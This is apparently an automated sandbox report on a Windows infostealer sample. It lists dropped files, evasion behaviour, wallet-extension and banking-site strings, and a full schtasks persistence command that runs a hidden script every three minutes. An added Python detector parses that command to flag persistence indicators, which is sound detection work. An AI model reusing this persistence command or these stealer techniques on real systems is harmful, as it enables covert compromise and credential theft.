                    Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll, kernel.appcore.dll, uxtheme.dll, sxs.dll, jscript.dll, iertutil.dll, amsi.dll, userenv.dll, profapi.dll, wldp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, msisip.dll, wshext.dll, scrobj.dll, mpr.dll, scrrun.dll, apphelp.dll, version.dll, kernel.appcore.dll, uxtheme.dll, sxs.dll, jscript.dll, iertutil.dll, amsi.dll, userenv.dll, profapi.dll, wldp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, msisip.dll, wshext.dll, scrobj.dll, mpr.dll, scrrun.dll
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif | Section loaded: wsock32.dll, version.dll, winmm.dll, mpr.dll, wininet.dll, iphlpapi.dll, userenv.dll, uxtheme.dll, kernel.appcore.dll, windows.storage.dll, wldp.dll, wsock32.dll, version.dll, winmm.dll, mpr.dll, wininet.dll, iphlpapi.dll, userenv.dll, uxtheme.dll, kernel.appcore.dll, windows.storage.dll, wldp.dll
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                    Source: Window Recorder | Window detected: More than 3 window changes detected
                    Source: mg9LPWGtPB.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: mozglue.pdbP source: Hist.pif, 0000000B.00000002.3103223842.000000006C52D000.00000002.00000001.01000000.00000009.sdmp, Hist.pif, 0000000B.00000002.3085053957.000000001978A000.00000004.00000800.00020000.00000000.sdmp, mozglue.dll.11.dr
                    Source: Binary string: freebl3.pdb source: Hist.pif, 0000000B.00000002.3082181966.000000001381C000.00000004.00000800.00020000.00000000.sdmp, freebl3.dll.11.dr
                    Source: Binary string: freebl3.pdbp source: Hist.pif, 0000000B.00000002.3082181966.000000001381C000.00000004.00000800.00020000.00000000.sdmp, freebl3.dll.11.dr
                    Source: Binary string: nss3.pdb@ source: Hist.pif, 0000000B.00000002.3097668223.000000003154B000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3103502423.000000006C6EF000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.11.dr
                    Source: Binary string: softokn3.pdb@ source: Hist.pif, 0000000B.00000002.3091622580.0000000025667000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr
                    Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: Hist.pif, 0000000B.00000002.3094585967.000000002B5DB000.00000004.00000800.00020000.00000000.sdmp, vcruntime140.dll.11.dr
                    Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: Hist.pif, 0000000B.00000002.3088383487.000000001F6FA000.00000004.00000800.00020000.00000000.sdmp, msvcp140.dll.11.dr
                    Source: Binary string: nss3.pdb source: Hist.pif, 0000000B.00000002.3097668223.000000003154B000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3103502423.000000006C6EF000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.11.dr
                    Source: Binary string: mozglue.pdb source: Hist.pif, 0000000B.00000002.3103223842.000000006C52D000.00000002.00000001.01000000.00000009.sdmp, Hist.pif, 0000000B.00000002.3085053957.000000001978A000.00000004.00000800.00020000.00000000.sdmp, mozglue.dll.11.dr
                    Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: Hist.pif, 0000000B.00000002.3078787220.000000000CCAF000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3078228591.000000000C878000.00000002.00001000.00020000.00000000.sdmp
                    Source: Binary string: softokn3.pdb source: Hist.pif, 0000000B.00000002.3091622580.0000000025667000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exe | Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_004062FC
                    Source: freebl3.dll.11.dr | Static PE information: section name: .00cfg
                    Source: mozglue.dll.11.dr | Static PE information: section name: .00cfg
                    Source: msvcp140.dll.11.dr | Static PE information: section name: .didat
                    Source: softokn3.dll.11.dr | Static PE information: section name: .00cfg
                    Source: nss3.dll.11.dr | Static PE information: section name: .00cfg
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | Code function: 11_2_00048AA5 push ecx; ret 11_2_00048AB8
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif | Code function: 38_2_00368AA5 push ecx; ret 38_2_00368AB8

                    Persistence and Installation Behavior

                    Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\661592\Bk.pif
                    Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\787041\Hist.pif
                    Source: C:\Users\user\AppData\Local\Temp\661592\Bk.pif | File created: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Windows_Services_AS[1].exe
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | File created: C:\ProgramData\mozglue.dll
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | File created: C:\ProgramData\nss3.dll
                    Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\661592\Bk.pif
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | File created: C:\ProgramData\msvcp140.dll
                    Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\787041\Hist.pif
                    Source: C:\Users\user\AppData\Local\Temp\661592\Bk.pif | File created: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | File created: C:\ProgramData\freebl3.dll
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | File created: C:\ProgramData\EHIJJDGDHD.exe
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | File created: C:\ProgramData\vcruntime140.dll
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | File created: C:\ProgramData\softokn3.dll
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | File created: C:\ProgramData\mozglue.dll
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | File created: C:\ProgramData\nss3.dll
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | File created: C:\ProgramData\msvcp140.dll
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | File created: C:\ProgramData\freebl3.dll
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | File created: C:\ProgramData\EHIJJDGDHD.exe
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | File created: C:\ProgramData\vcruntime140.dll
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | File created: C:\ProgramData\softokn3.dll

                    Boot Survival

                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Chassis" /tr "wscript //B 'C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | Code function: 11_2_000A577B IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 11_2_000A577B
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | Code function: 11_2_00035EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 11_2_00035EDA
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif | Code function: 38_2_003C577B IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 38_2_003C577B
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif | Code function: 38_2_00355EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 38_2_00355EDA
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | Code function: 11_2_000432E9 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 11_2_000432E9
Source: C:\Users\user\Desktop\mg9LPWGtPB.exe	Process information set: NOOPENFILEERRORBOX (12 occurrences)
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif	Process information set: NOOPENFILEERRORBOX (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif	Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX (2 occurrences)
Source: C:\ProgramData\EHIJJDGDHD.exe	Process information set: NOOPENFILEERRORBOX (12 occurrences)
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\661592\Bk.pif	Process information set: NOOPENFILEERRORBOX (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\661592\Bk.pif	Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\661592\Bk.pif	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX (4 occurrences)
Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif	Process information set: NOOPENFILEERRORBOX (2 occurrences)
Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif	Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif	Process information set: NOOPENFILEERRORBOX (2 occurrences)
Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif	Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
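
The schtasks line at the top of this section is the sample's persistence: a daily task named Chassis whose action is wscript //B on a .js file under AppData\Local, re-armed every 3 minutes (/ri 3) for a 23:57 window (/du), created with /RL HIGHEST and /F. The Python below is an added example, not code from the report or from the sample: it parses a schtasks /create command line into its switches and enumerates those indicators, so the same check can run over schtasks command lines from Sysmon or EDR process-creation telemetry. The splitter, the switch table, the findings and the benign control line are my own; the splitter is deliberately minimal (quotes group a token, nothing else) and the only real input is the report's own command line.

```python
"""Parse a `schtasks /create` command line and flag persistence indicators.

Added example, not code from the report or from the sample. The only real input
is the schtasks line the report shows; the benign line is constructed, and the
splitter, switch table and findings are my own.
"""
from __future__ import annotations
from dataclasses import dataclass, field

# Copied from the report's Boot Survival row.
REPORT_CMDLINE = (
    'schtasks.exe /create /tn "Chassis" '
    "/tr \"wscript //B 'C:\\Users\\user\\AppData\\Local\\SunCraft Innovations\\SolarSys.js'\" "
    "/sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST"
)
# Constructed control case: a plain nightly job under Program Files.
BENIGN_CMDLINE = ('schtasks /create /tn "Nightly Backup" '
                  '/tr "C:\\Program Files\\Backup\\backup.exe" /sc daily /st 02:00')

# schtasks switches that take a value; any other token starting with "/" is a flag.
VALUED = {"/tn", "/tr", "/sc", "/mo", "/ri", "/du", "/rl", "/st", "/sd", "/ed",
          "/ru", "/rp", "/d", "/m", "/i", "/s", "/u", "/p", "/xml", "/ec"}
SCRIPT_HOSTS = {"wscript", "wscript.exe", "cscript", "cscript.exe", "mshta",
                "mshta.exe", "powershell", "powershell.exe"}
USER_WRITABLE = ("\\appdata\\", "\\programdata\\", "\\temp\\", "\\users\\public\\")


def split_args(cmdline: str, quotes: str = '"') -> list[str]:
    """Split on whitespace; a char from `quotes` groups a token and is dropped.
    Enough for schtasks lines, not a full CommandLineToArgvW clone."""
    args, cur, open_quote = [], [], None
    for ch in cmdline:
        if open_quote is None and ch in quotes:
            open_quote = ch
        elif ch == open_quote:
            open_quote = None
        elif ch.isspace() and open_quote is None:
            if cur:
                args.append("".join(cur))
                cur = []
        else:
            cur.append(ch)
    if cur:
        args.append("".join(cur))
    return args


def parse_switches(tokens: list[str]) -> dict[str, str | bool]:
    """Lower-cased switch -> its value, or True for a bare flag such as /F."""
    opts: dict[str, str | bool] = {}
    i = 0
    while i < len(tokens):
        key = tokens[i].lower()
        if key.startswith("/"):
            if key in VALUED and i + 1 < len(tokens):
                opts[key] = tokens[i + 1]
                i += 1
            else:
                opts[key] = True
        i += 1
    return opts


def minutes(hhmm: str) -> int:
    hours, mins = hhmm.split(":")
    return int(hours) * 60 + int(mins)


@dataclass
class TaskAssessment:
    name: str
    action: str
    triggers_per_day: int
    run_level: str
    force: bool
    findings: list[str] = field(default_factory=list)


def assess_task_create(cmdline: str) -> TaskAssessment:
    opts = parse_switches(split_args(cmdline))
    if "/create" not in opts:
        raise ValueError("not a schtasks /create command line")
    action = str(opts.get("/tr", ""))
    # The action is itself a command line; this task single-quoted the script
    # path, so accept both quote styles when splitting it.
    action_tokens = split_args(action, quotes="\"'")
    image = action_tokens[0].lower() if action_tokens else ""
    run_level = str(opts.get("/rl", "LIMITED")).upper()
    force = opts.get("/f") is True
    per_day = 1 if str(opts.get("/sc", "")).lower() == "daily" else 0
    if "/ri" in opts and "/du" in opts:  # repeat every /ri minutes for /du hh:mm
        per_day = max(per_day, minutes(str(opts["/du"])) // int(str(opts["/ri"])))
    findings = []
    if image in SCRIPT_HOSTS:
        findings.append(f"task action runs a script host ({image})")
    if any(tok.lower() == "//b" for tok in action_tokens):
        findings.append("//B batch mode suppresses script errors and prompts")
    if any(marker in action.lower() for marker in USER_WRITABLE):
        findings.append("script or executable lives in a user-writable directory")
    if run_level == "HIGHEST":
        findings.append("/RL HIGHEST runs with the creator's highest available token")
    if per_day >= 100:
        findings.append(f"repeat interval gives about {per_day} runs per day (watchdog)")
    if force:
        findings.append("/F silently replaces any existing task of that name")
    return TaskAssessment(str(opts.get("/tn", "")), action, per_day, run_level, force, findings)


if __name__ == "__main__":
    for line in (REPORT_CMDLINE, BENIGN_CMDLINE):
        result = assess_task_create(line)
        print(f"{result.name}: {result.triggers_per_day} runs/day, {len(result.findings)} findings")
        print(*("  - " + f for f in result.findings), sep="\n")
```

Run as a script it reports six findings for the report's line, including about 479 triggers per day, and none for the control. A task that re-arms itself every few minutes behaves as a watchdog: killing SolarSys.pif without deleting the Chassis task only buys three minutes, so remediation has to remove the task (and the .js it launches) first.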

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\mg9LPWGtPB.exe	Stalling execution: Execution stalls by calling Sleep
Source: C:\ProgramData\EHIJJDGDHD.exe	Stalling execution: Execution stalls by calling Sleep
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif	Dropped PE file which has not been started: C:\ProgramData\nss3.dll
Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll
Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll
Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif	API coverage: 4.3 %
Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif	API coverage: 4.9 %
Source: C:\Windows\SysWOW64\timeout.exe TID: 6528	Thread sleep count: 121 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 5708	Thread sleep count: 87 > 30
Source: C:\Users\user\AppData\Local\Temp\661592\Bk.pif TID: 5700	Thread sleep time: -42000s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 3220	Thread sleep count: 125 > 30
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed (7 occurrences)
Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\mg9LPWGtPB.exe	Code function: 0_2_004062D5 FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\mg9LPWGtPB.exe	Code function: 0_2_00402E18 FindFirstFileW
Source: C:\Users\user\Desktop\mg9LPWGtPB.exe	Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW
Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif	Code function: 11_2_000847B7 GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif	Code function: 11_2_00083E72 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif	Code function: 11_2_0008C16C FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif	Code function: 11_2_0008CB81 FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif	Code function: 11_2_0008CC0C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif	Code function: 11_2_0008F445 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif	Code function: 11_2_0008F5A2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif	Code function: 11_2_0008F8A3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif	Code function: 11_2_00083B4F FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\ProgramData\EHIJJDGDHD.exe	Code function: 16_2_004062D5 FindFirstFileW,FindClose
Source: C:\ProgramData\EHIJJDGDHD.exe	Code function: 16_2_00402E18 FindFirstFileW
Source: C:\ProgramData\EHIJJDGDHD.exe	Code function: 16_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW
Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif	Code function: 38_2_003A47B7 GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif	Code function: 38_2_003AC16C FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif	Code function: 38_2_003ACB81 FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif	Code function: 38_2_003ACC0C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif	Code function: 38_2_003AF445 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif	Code function: 38_2_003AF5A2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif	Code function: 38_2_003AF8A3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif	Code function: 38_2_003A3B4F FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif	Code function: 38_2_003A3E72 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif	Code function: 11_2_00035D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: EHDGIJ.11.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: EHDGIJ.11.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: EHDGIJ.11.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: EHDGIJ.11.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: EHDGIJ.11.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: EHDGIJ.11.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: mg9LPWGtPB.exe	Binary or memory string: >:hGfSa
Source: Hist.pif, 0000000B.00000002.3072148698.00000000015DF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: EHDGIJ.11.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: EHDGIJ.11.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: EHDGIJ.11.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: EHDGIJ.11.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: EHDGIJ.11.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: EHDGIJ.11.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: EHDGIJ.11.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: EHDGIJ.11.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: EHDGIJ.11.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: EHDGIJ.11.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: EHDGIJ.11.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: EHDGIJ.11.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: EHDGIJ.11.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: EHDGIJ.11.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: EHDGIJ.11.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: Hist.pif, 0000000B.00000002.3072148698.0000000001593000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWxF^
Source: EHDGIJ.11.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: EHDGIJ.11.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: EHDGIJ.11.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: EHDGIJ.11.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: EHDGIJ.11.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: EHDGIJ.11.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: Hist.pif, 0000000B.00000002.3072722051.0000000004653000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: EHDGIJ.11.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: EHDGIJ.11.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: EHDGIJ.11.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: EHDGIJ.11.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif	Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif	Code function: 11_2_000943B9 BlockInput
Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif	Code function: 11_2_00035240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif	Code function: 11_2_00055BDC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer
Source: C:\Users\user\Desktop\mg9LPWGtPB.exe	Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress
